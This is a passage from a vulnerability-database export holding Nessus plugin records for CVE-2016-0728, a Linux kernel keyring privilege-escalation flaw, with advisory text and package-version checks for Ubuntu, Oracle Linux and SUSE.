value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:15", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2870-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88010", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88010);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-2870-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2870-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-generic-lpae\", pkgver:\"3.13.0-76.120\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-76-lowlatency\", pkgver:\"3.13.0-76.120\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:03", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2016-0064 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : kernel (ELSA-2016-0064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88168", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-0064.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88168);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/09/08\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2016-0064)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2016-0064 advisory.\n\n - The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1\n mishandles object references in a certain error case, which allows local users to gain privileges or cause\n a denial of service (integer overflow and use-after-free) via crafted keyctl commands. (CVE-2016-0728)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2016-0064.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.10.0-327.4.5.el7'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2016-0064');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does 
not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.10';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'kernel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-3.10.0'},\n {'reference':'kernel-abi-whitelists-3.10.0-327.4.5.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-abi-whitelists-3.10.0'},\n {'reference':'kernel-debug-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-3.10.0'},\n {'reference':'kernel-debug-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-debug-devel-3.10.0'},\n {'reference':'kernel-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-devel-3.10.0'},\n {'reference':'kernel-headers-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-headers-3.10.0'},\n {'reference':'kernel-tools-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-3.10.0'},\n {'reference':'kernel-tools-libs-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-libs-3.10.0'},\n {'reference':'kernel-tools-libs-devel-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-tools-libs-devel-3.10.0'},\n {'reference':'perf-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'python-perf-3.10.0-327.4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, 
{"lastseen": "2023-05-18T14:19:48", "description": "The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with join_session_keyring() could lead to local attackers gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0205-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88144", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0205-1.\n# The text itself is copyright 
(C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88144);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0205-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to receive a security\nfix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160205-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3fd53631\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-137=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-137=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-137=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-137=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-137=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-137=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/22\");\n 
